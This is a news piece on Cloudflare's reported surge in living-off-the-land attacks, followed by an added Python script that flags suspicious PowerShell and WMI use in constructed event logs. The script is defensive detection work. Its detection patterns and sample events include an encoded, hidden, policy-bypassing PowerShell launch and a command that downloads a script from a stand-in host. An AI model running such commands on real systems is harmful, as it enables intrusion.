Cloudflare Reports Surge in Living-off-the-Land Cyberattacks Using Legitimate Enterprise Software
Cloudflare alerts enterprises to a surge in LotL cyberattacks, where hackers use legitimate system tools and cloud apps to hide their malicious activities.
By: AXL Media
Published: Feb 25, 2026, 5:26 AM EST
Source: The information in this article was sourced from ITPro

Stealth Tactics Bypass Traditional Security Perimeters
Cybersecurity firm Cloudflare has observed a significant evolution in the methods used by sophisticated, state-sponsored threat actors to infiltrate corporate networks. Rather than deploying custom malware that might trigger antivirus signatures, these hackers are increasingly using "Living-off-the-Land" (LotL) techniques: legitimate system tools, such as PowerShell, Windows Management Instrumentation (WMI), and administrative scripts, are used to move through a network. According to Cloudflare, this approach makes it nearly impossible for traditional security solutions to distinguish between a malicious command and a routine task performed by a system administrator.
Weaponizing the Enterprise Ecosystem
The modern enterprise environment, filled with integrated cloud services and productivity suites, has inadvertently provided a massive toolkit for attackers. Cloudflare's analysis suggests that hackers are using trusted applications like Microsoft Teams, Slack, and common cloud storage platforms to exfiltrate data and communicate with command-and-control servers. By operating within the "enterprise ecosystem," attackers can bypass strict firewall rules that would otherwise block traffic to unknown or suspicious domains. According to security researchers, this strategy effectively turns a company's internal infrastructure against itself.
Surge in State-Backed Espionage Campaigns
The rise in LotL attacks is primarily attributed to well-resourced, state-backed hacking groups seeking long-term persistence in critical infrastructure and government sectors. These actors prioritize "low and slow" operations, where the goal is to remain embedded in the network for months or even years without being detected. According to Cloudflare, the lack of a "malicious file" to scan means that even advanced Endpoint Detection and Response systems can be circumvented if they are not specifically configured to monitor for the anomalous use of authorized administrative tools.
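The two points above, that PowerShell and WMI commands look like routine administration and that EDR only helps if it is configured to flag anomalous use of those tools, are what a detection engineer has to turn into concrete rules. The following script is an added example and is not Cloudflare's code or part of the ITPro report: it triages constructed process-creation records (shaped like Sysmon Event ID 1 fields) and flags the context, not the tool. The admin-account baseline, the parent-process lists, the account names and the command lines are all assumptions built for the example.

```python
"""Heuristic triage of process-creation events for anomalous use of
built-in admin tools (PowerShell, WMI).

Added example. The events below are constructed; a real pipeline would read
the same fields from the Windows event log, Sysmon or a SIEM.
"""
import re

# Constructed baseline: accounts expected to run admin tooling (assumption).
ADMIN_ACCOUNTS = {"corp\\svc-backup", "corp\\it-admin"}

# Built-in tools whose use is routine for admins and therefore easy to hide in.
ADMIN_TOOLS = {"powershell.exe", "pwsh.exe", "wmic.exe"}

# Document-handling apps that have no business launching an admin shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Switches that hide a PowerShell window or bypass script policy / pass code as base64.
OBFUSCATION_FLAGS = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\b"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|-exec(?:utionpolicy)?\s+bypass",
    re.IGNORECASE,
)
# Fetching and running remote content from the command line.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|\biex\b|invoke-expression",
    re.IGNORECASE,
)
# WMI directed at another host (lateral movement looks like remote administration).
REMOTE_WMI = re.compile(r"/node:|invoke-wmimethod|invoke-cimmethod", re.IGNORECASE)

# Constructed sample events (assumption: Sysmon-like field names).
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\svc-backup",
     "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"id": 2, "user": "CORP\\jdoe",
     "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand <base64-placeholder>"},
    {"id": 3, "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\wmic.exe",
     "cmdline": "wmic /node:FILESRV01 process list brief"},
    {"id": 4, "user": "CORP\\it-admin",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wbem\\wmic.exe",
     "cmdline": "wmic /node:FILESRV01 process list brief"},
    {"id": 5, "user": "CORP\\jdoe",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe -Command "Invoke-WebRequest -Uri '
                'http://update.example.invalid/tool.ps1 -OutFile $env:TEMP\\tool.ps1"'},
]


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the list of reasons an event is anomalous (empty = nothing to see).

    The same command line is judged differently depending on who ran it and
    what launched it: that context is what distinguishes an attacker living
    off the land from an administrator doing their job.
    """
    reasons = []
    image = basename(event["image"])
    if image not in ADMIN_TOOLS:
        return reasons
    parent = basename(event["parent"])
    user = event["user"].lower()
    cmd = event["cmdline"]

    if parent in OFFICE_PARENTS:
        reasons.append("admin tool spawned by Office application")
    if OBFUSCATION_FLAGS.search(cmd):
        reasons.append("encoded/hidden/bypass PowerShell switches")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle in command line")
    if REMOTE_WMI.search(cmd) and user not in ADMIN_ACCOUNTS:
        reasons.append("remote WMI invocation by account outside admin baseline")
    return reasons


def flagged_events(events):
    """Map event id -> reasons for every event that tripped at least one rule."""
    return {e["id"]: r for e in events if (r := triage(e))}


if __name__ == "__main__":
    for event_id, reasons in flagged_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {'; '.join(reasons)}")
```

Event 3 and event 4 carry the identical command line; only the account differs, and only event 3 is flagged. That is the configuration the article says EDR needs: a baseline of who is expected to run WMI and PowerShell, and rules on parent process and switches, rather than a signature on the binary itself. Tuning the baseline (service accounts, jump hosts, scheduled-task parents) is where most of the false-positive work in a real deployment goes.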